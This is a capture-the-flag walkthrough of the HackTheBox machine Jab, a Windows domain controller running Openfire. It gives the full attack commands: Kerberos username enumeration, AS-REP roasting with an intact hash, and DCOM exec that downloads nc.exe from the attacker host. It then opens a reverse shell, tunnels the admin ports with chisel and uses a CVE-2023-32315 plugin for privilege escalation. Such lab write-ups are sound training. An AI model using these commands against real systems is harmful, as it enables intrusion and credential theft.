HackTheBox | Jab

In this walkthrough, I demonstrate how I obtained complete ownership of Jab on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Medium Challenge
Owned Jab from Hack The Box!
I have just owned machine Jab from Hack The Box

Nmap Results

Show Nmap Scan Results

# Nmap 7.94SVN scan initiated Tue Feb 27 12:31:36 2024 as: nmap -Pn -p- --min-rate 2000 -A -oN nmap.txt 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.012s latency).
Not shown: 65503 closed tcp ports (reset)
PORT      STATE SERVICE             VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-02-27 17:32:00Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-02-27T17:34:46+00:00; 0s from scanner time.
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-27T17:34:45+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
5222/tcp  open  jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     compression_methods: 
|     features: 
|     stream_id: 2w1nsbkqd
|     xmpp: 
|       version: 1.0
|_    capabilities: 
|_ssl-date: TLS randomness does not represent time
5223/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     unknown: 
|     compression_methods: 
|     features: 
|     xmpp: 
|_    capabilities: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5262/tcp  open  jabber
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     compression_methods: 
|     features: 
|     stream_id: 1luyjkdr8f
|     xmpp: 
|       version: 1.0
|_    capabilities: 
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     unknown: 
|     compression_methods: 
|     features: 
|     xmpp: 
|_    capabilities: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     unknown: 
|     compression_methods: 
|     features: 
|     xmpp: 
|_    capabilities: 
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5275/tcp  open  jabber
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     compression_methods: 
|     features: 
|     stream_id: qj9t3bq52
|     xmpp: 
|       version: 1.0
|_    capabilities: 
5276/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     unknown: 
|     compression_methods: 
|     features: 
|     xmpp: 
|_    capabilities: 
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  realserver?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 17:32:00 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 17:32:05 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp  open  ssl/oracleas-https?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 17:32:06 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 17:32:11 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
7777/tcp  open  socks5              (No authentication; connection not allowed by ruleset)
| socks-auth-info: 
|_  No authentication
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49669/tcp open  msrpc               Microsoft Windows RPC
49670/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc               Microsoft Windows RPC
49672/tcp open  msrpc               Microsoft Windows RPC
49677/tcp open  msrpc               Microsoft Windows RPC

Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-27T17:34:34
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   13.23 ms 10.10.14.1
2   13.28 ms 10.10.11.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 27 12:34:47 2024 -- 1 IP address (1 host up) scanned in 191.67 seconds

We can see the references to DC01.jab.htb and jab.htb in the nmap output. Let's go ahead and get those added to our /etc/hosts file.

echo '10.10.11.4        DC01.jab.htb jab.htb' | sudo tee -a /etc/hosts





Service Enumeration

TCP/53

NXDOMAIN despite the jab.htb domain in LDAP, moving on



TCP/139,445

Anonymous login successful, but no enumerable shares
ℹ️
Noting the successful anonymous login, I tried SMB Null session enumeration of usernames via RID cycling, but did not have permissions to make RPC calls.



TCP/88

Let's see if we can enumerate any valid usernames using Kerberos pre-authentication requests.

Kerberos Pre-Auth User... | 0xBEN | Notes
How it Works We can send a request for a TGT --- without a pre-authentication hash --- to the Kerbe…
cat /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt | sed -e 's/[A-Z]/[a-z]/g' | sort -u > kerberos_users.txt`

Generate the username list

kerbrute userenum -d jab.htb --dc 10.10.11.4 -t 1000 -o kerbrute.log ./kerberos_users.txt

Reduce the number of threads according to your specifications

Tons and tons of matches!
1646 potential usernames
AS-REP Roasting (Inter... | 0xBEN | Notes
AS-REP Roasting If Kerberos pre-authentication is disabled on a user account in Active Directory, t…
grep '@' kerbrute.log | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > as_rep_list.txt

Generate a list of usernames to test for AS-REP roasting

impacket-GetNPUsers -usersfile as_rep_list.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
$krb5asrep$23$mlowe@JAB.HTB:feb912709fedfdb00ee8461dd2d8d579$0e57db329bf1fceedd7aeb9f903794f464315745d264a18c411bd6e72bcb34415b7814af12f3a3b8f146ddd3fb6cbd482181631bd85d8a3a749cde4da82ce245f632c32ce5bb97ad24f6d0aa38bcc01b23f5de781537a0fabb74e69617b228f979904959b43dd0d7207d90192d16af5603b156d8a8773c350d72714bc06c874430cf1df31995d164b9d5a129c868a53eace8375c3ea4234231e08ed74e2a4e0a073a7f5dcbf10264c681131258b163791d9ae653cbd08421497d7d878857401af6e19596e621529d10f48ec20ab0e54f21f7e150af8658c56819b92a2aacdb99c4aa

The user 'mlowe' appears to be AS-REP roastable

echo '$krb5asrep$23$mlowe@JAB.HTB:feb912709fedfdb00ee8461dd2d8d579$0e57db329bf1fceedd7aeb9f903794f464315745d264a18c411bd6e72bcb34415b7814af12f3a3b8f146ddd3fb6cbd482181631bd85d8a3a749cde4da82ce245f632c32ce5bb97ad24f6d0aa38bcc01b23f5de781537a0fabb74e69617b228f979904959b43dd0d7207d90192d16af5603b156d8a8773c350d72714bc06c874430cf1df31995d164b9d5a129c868a53eace8375c3ea4234231e08ed74e2a4e0a073a7f5dcbf10264c681131258b163791d9ae653cbd08421497d7d878857401af6e19596e621529d10f48ec20ab0e54f21f7e150af8658c56819b92a2aacdb99c4aa' > as_rep_hash
john --wordlist=rockyou.txt as_rep_hash

Let's see if we can crack it using 'rockyou.txt'

Does not appear to be in the 'rockyou.txt' word list (also tested other word lists)



TCP/5222

I'm not familiar with the steps needed to enumerate the Jabber attack surface, but looking at the nmap output, it seems the Jabber (XMPP) server has bound to multiple ports including tcp/5223, tcp/5262, tcp/5263, tcp/5275, tcp/5276, tcp/7070, tcp/7443.

Let's start by asking Google for some information.

Researching Jabber Enumeration

jabber pentest - Google Search
XMPP service is an underappreciated attack surface for pen testers
Misconfigured XMPP (aka Jabber) servers may not be the most common service you encounter during pen tests, but they can prove very valuable. Read more.

Lots of good information here



Connect with a Jabber Client

The article referenced above uses the pidgin XMPP client, so that's what we'll use.

sudo apt install -y pidgin
Click 'Add...'
Click 'Add'
Click 'View Certificate...' to ensure the correct server and click 'Accept'
Click 'Accounts > Manage Accounts'
Enable your account
Go to 'Accounts > user@jab.htb > Search for users..'
Run a wildcard search



Exporting the User List

There isn't a clear way of exporting the usernames from this user search function, so we'll have to get creative.

Click 'Help > Debug Window'
Set the filter and log level accordingly
Search by email only
We've got usernames! Click 'Pause' to stop logging. Then, save the log file.
grep -oE '[A-Za-z0-9]{1,}\@jab.htb' jabber.log | grep -v 'ben@jab.htb' | sort -u > jabber_emails.txt
cat jabber_emails.txt | cut -d '@' -f 1 > jabber_usernames.txt

Get all emails from the log and filter out my own username, then create a username list



AS-REP Roast with the New List

diff as_rep_list.txt jabber_usernames.txt | grep '>' | awk -v FS=' ' '{print $2}' > jabber_as_rep.txt

We're going to AS-REP roast again, but only on names that are unique to Jabber

impacket-GetNPUsers -usersfile jabber_as_rep.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
Nice! We've got two more hashes we can try and crack!
john --wordlist=rockyou.txt as_rep_hashes.txt
Excellent! We have a credential we can test with now!



Adding the Jabber Account

Accept the server certificate
Click 'Tools > Room List'
Click 'Get List'
Open the 'pentest2003' room
We find a password for the 'svc_openfire' SPN
⚠️
I tried spraying this password around with a few tools, but didn't find anything too useful. Let's enumerate LDAP with the jmontgomery credential and see who has access to what.



TCP/3269

ldapdomaindump -u 'JAB.HTB\jmontgomery' -p 'Midnight_121' -o ldd ldaps://dc01.jab.htb:3269
open ldd/domain_users_by_group.html
pentest distributed com - Google Search
DCOM Exec - HackTricks
pentest dcom kali - Google Search
139,445 - Pentesting SMB - HackTricks
impacket dcomexec | WADComs
# Check help output for usage
impacket-dcomexec -h
impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'ping 10.10.14.181'





Exploit

DCOM Exec to Reverse Shell

cp /usr/share/windows-resources/binaries/nc.exe .                        

Copy the on-system 'nc.exe' binary to the current directory

sudo python3 -m http.server 80

Host 'nc.exe' over HTTP

impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'certutil -f -urlcache -split http://10.10.14.181/nc.exe C:\Windows\Tasks\nc.exe'

Use DCOM to download 'nc.exe' to the target

We can see the target has successfully grabbed the file
sudo rlwrap nc -lnvp 443

Start a TCP listener

impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'C:\Windows\Tasks\nc.exe 10.10.14.181 443 -e powershell.exe'

Use DCOM to run a PowerShell reverse shell over the 'nc.exe' socket





Post-Exploit Enumeration

Operating Environment

OS & Kernel

WindowsBuildLabEx                                       : 17763.1.x86fre.rs5_release.180914-1434
WindowsCurrentVersion                                   : 6.3
WindowsEditionId                                        : ServerStandard
WindowsInstallationType                                 : Server
WindowsInstallDateFromRegistry                          : 1/1/1970 12:00:00 AM
WindowsProductId                                        : 
WindowsProductName                                      : Windows Server 2019 Standard
WindowsRegisteredOrganization                           : 
WindowsRegisteredOwner                                  : Windows User
WindowsSystemRoot                                       : C:\Windows
WindowsVersion                                          : 1809
BiosCharacteristics                                     : 
BiosBIOSVersion                                         : 
BiosBuildNumber                                         : 
BiosCaption                                             : 
BiosCodeSet                                             : 
BiosCurrentLanguage                                     : 
BiosDescription                                         : 
BiosEmbeddedControllerMajorVersion                      : 
BiosEmbeddedControllerMinorVersion                      : 
BiosFirmwareType                                        : 
BiosIdentificationCode                                  : 
BiosInstallableLanguages                                : 
BiosInstallDate                                         : 
BiosLanguageEdition                                     : 
BiosListOfLanguages                                     : 
BiosManufacturer                                        : 
BiosName                                                : 
BiosOtherTargetOS                                       : 
BiosPrimaryBIOS                                         : 
BiosReleaseDate                                         : 
BiosSeralNumber                                         : 
BiosSMBIOSBIOSVersion                                   : 
BiosSMBIOSMajorVersion                                  : 
BiosSMBIOSMinorVersion                                  : 
BiosSMBIOSPresent                                       : 
BiosSoftwareElementState                                : 
BiosStatus                                              : 
BiosSystemBiosMajorVersion                              : 
BiosSystemBiosMinorVersion                              : 
BiosTargetOperatingSystem                               : 
BiosVersion                                             : 
CsAdminPasswordStatus                                   : 
CsAutomaticManagedPagefile                              : 
CsAutomaticResetBootOption                              : 
CsAutomaticResetCapability                              : 
CsBootOptionOnLimit                                     : 
CsBootOptionOnWatchDog                                  : 
CsBootROMSupported                                      : 
CsBootStatus                                            : 
CsBootupState                                           : 
CsCaption                                               : 
CsChassisBootupState                                    : 
CsChassisSKUNumber                                      : 
CsCurrentTimeZone                                       : 
CsDaylightInEffect                                      : 
CsDescription                                           : 
CsDNSHostName                                           : 
CsDomain                                                : 
CsDomainRole                                            : 
CsEnableDaylightSavingsTime                             : 
CsFrontPanelResetStatus                                 : 
CsHypervisorPresent                                     : 
CsInfraredSupported                                     : 
CsInitialLoadInfo                                       : 
CsInstallDate                                           : 
CsKeyboardPasswordStatus                                : 
CsLastLoadInfo                                          : 
CsManufacturer                                          : 
CsModel                                                 : 
CsName                                                  : 
CsNetworkAdapters                                       : 
CsNetworkServerModeEnabled                              : 
CsNumberOfLogicalProcessors                             : 
CsNumberOfProcessors                                    : 
CsProcessors                                            : 
CsOEMStringArray                                        : 
CsPartOfDomain                                          : 
CsPauseAfterReset                                       : 
CsPCSystemType                                          : 
CsPCSystemTypeEx                                        : 
CsPowerManagementCapabilities                           : 
CsPowerManagementSupported                              : 
CsPowerOnPasswordStatus                                 : 
CsPowerState                                            : 
CsPowerSupplyState                                      : 
CsPrimaryOwnerContact                                   : 
CsPrimaryOwnerName                                      : 
CsResetCapability                                       : 
CsResetCount                                            : 
CsResetLimit                                            : 
CsRoles                                                 : 
CsStatus                                                : 
CsSupportContactDescription                             : 
CsSystemFamily                                          : 
CsSystemSKUNumber                                       : 
CsSystemType                                            : 
CsThermalState                                          : 
CsTotalPhysicalMemory                                   : 
CsPhyicallyInstalledMemory                              : 
CsUserName                                              : 
CsWakeUpType                                            : 
CsWorkgroup                                             : 
OsName                                                  : 
OsType                                                  : 
OsOperatingSystemSKU                                    : 
OsVersion                                               : 
OsCSDVersion                                            : 
OsBuildNumber                                           : 
OsHotFixes                                              : 
OsBootDevice                                            : 
OsSystemDevice                                          : 
OsSystemDirectory                                       : 
OsSystemDrive                                           : 
OsWindowsDirectory                                      : 
OsCountryCode                                           : 
OsCurrentTimeZone                                       : 
OsLocaleID                                              : 
OsLocale                                                : 
OsLocalDateTime                                         : 
OsLastBootUpTime                                        : 
OsUptime                                                : 
OsBuildType                                             : 
OsCodeSet                                               : 
OsDataExecutionPreventionAvailable                      : 
OsDataExecutionPrevention32BitApplications              : 
OsDataExecutionPreventionDrivers                        : 
OsDataExecutionPreventionSupportPolicy                  : 
OsDebug                                                 : 
OsDistributed                                           : 
OsEncryptionLevel                                       : 
OsForegroundApplicationBoost                            : 
OsTotalVisibleMemorySize                                : 
OsFreePhysicalMemory                                    : 
OsTotalVirtualMemorySize                                : 
OsFreeVirtualMemory                                     : 
OsInUseVirtualMemory                                    : 
OsTotalSwapSpaceSize                                    : 
OsSizeStoredInPagingFiles                               : 
OsFreeSpaceInPagingFiles                                : 
OsPagingFiles                                           : 
OsHardwareAbstractionLayer                              : 
OsInstallDate                                           : 
OsManufacturer                                          : 
OsMaxNumberOfProcesses                                  : 
OsMaxProcessMemorySize                                  : 
OsMuiLanguages                                          : 
OsNumberOfLicensedUsers                                 : 
OsNumberOfProcesses                                     : 
OsNumberOfUsers                                         : 
OsOrganization                                          : 
OsArchitecture                                          : 
OsLanguage                                              : 
OsProductSuites                                         : 
OsOtherTypeDescription                                  : 
OsPAEEnabled                                            : 
OsPortableOperatingSystem                               : 
OsPrimary                                               : 
OsProductType                                           : 
OsRegisteredUser                                        : 
OsSerialNumber                                          : 
OsServicePackMajorVersion                               : 
OsServicePackMinorVersion                               : 
OsStatus                                                : 
OsSuites                                                : 
OsServerLevel                                           : 
KeyboardLayout                                          : 
TimeZone                                                : (UTC-05:00) Eastern Time (US & Canada)
LogonServer                                             : 
PowerPlatformRole                                       : Desktop
HyperVisorPresent                                       : 
HyperVRequirementDataExecutionPreventionAvailable       : 
HyperVRequirementSecondLevelAddressTranslation          : 
HyperVRequirementVirtualizationFirmwareEnabled          : 
HyperVRequirementVMMonitorModeExtensions                : 
DeviceGuardSmartStatus                                  : Off
DeviceGuardRequiredSecurityProperties                   : 
DeviceGuardAvailableSecurityProperties                  : 
DeviceGuardSecurityServicesConfigured                   : 
DeviceGuardSecurityServicesRunning                      : 
DeviceGuardCodeIntegrityPolicyEnforcementStatus         : 
DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus :     

Current User

USER INFORMATION
----------------

User Name        SID                                         
================ ============================================
jab\svc_openfire S-1-5-21-715914501-2118353807-243417633-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                        
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users               Alias            S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled    



Users and Groups

See ldapdomaindump data.



Network Configurations

Network Interfaces

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.11.4
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2    

Open Ports

127.0.0.1:9090         0.0.0.0:0              LISTENING       3192
127.0.0.1:9091         0.0.0.0:0              LISTENING       3192    



Interesting Files

C:\Program Files\Openfire\conf\openfire.xml

  <adminConsole> 
    <!-- Disable either port by setting the value to -1 -->  
    <port>9090</port>  
    <securePort>9091</securePort>  
    <interface>127.0.0.1</interface> 
  </adminConsole>      





Privilege Escalation

In the post-exploit enumeration steps, we found a couple of ports listening internally on tcp/9090 and tcp/9091 and we can further see that it's associated with process ID 3076. We can see these TCP ports referenced as the Openfire admin console ports in openfire.xml.

Port 9090 (tcp/udp)
Port 9090 tcp/udp information, assignments, application use and known security risks.

Let's transfer chisel.exe to the target, so we can forward those ports.

Port Forwarding with C... | 0xBEN | Notes
GitHub Download from the Releases Page Usage Requires a copy of the Chisel binary on: The ta…

I just used the download_chisel function referenced in my notes above to download both chisel and chisel.exe.

sudo python3 -m http.server 80

Start a web server to host chisel.exe over HTTP

iwr -useb http://10.10.14.181/chisel.exe -o C:\Windows\Tasks\chisel.exe

Download chisel.exe in our reverse shell

sudo ./chisel server --port 8081 --reverse &

Start the chisel server in the background on Kali

impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'C:\Windows\Tasks\chisel.exe client 10.10.14.181:8081 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091'

Use DCOM to remotely start the process

The 'svc_openfire:!@#$%^&*(1qazxsw' credentials work here as well
We can see there is a way to upload plugins in .jar format
openfire ”.jar” shell - Google Search
This Metasploit module will generates a malicious .jar, but the exploit can't be used against this target, so let's do some further Googling
cve-2023-32315 .jar - Google Search
Let's see what we can do with this .jar file
wget https://github.com/miko550/CVE-2023-32315/raw/main/openfire-management-tool-plugin.jar -O plugin.jar
Upload the plugin
Go to Server > Server Settings > Management Tool
Enter password '123'
Choose 'system command' from the menu
sudo rlwrap nc -lnvp 443

Start a TCP listener

Use the existing 'nc.exe' binary on the box to connect



Flags

User

cbe0287bba2a7a8b60575f9fbc09ee44    

Root

97c1833cc7ea11ba52044b004bb51f1b    
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.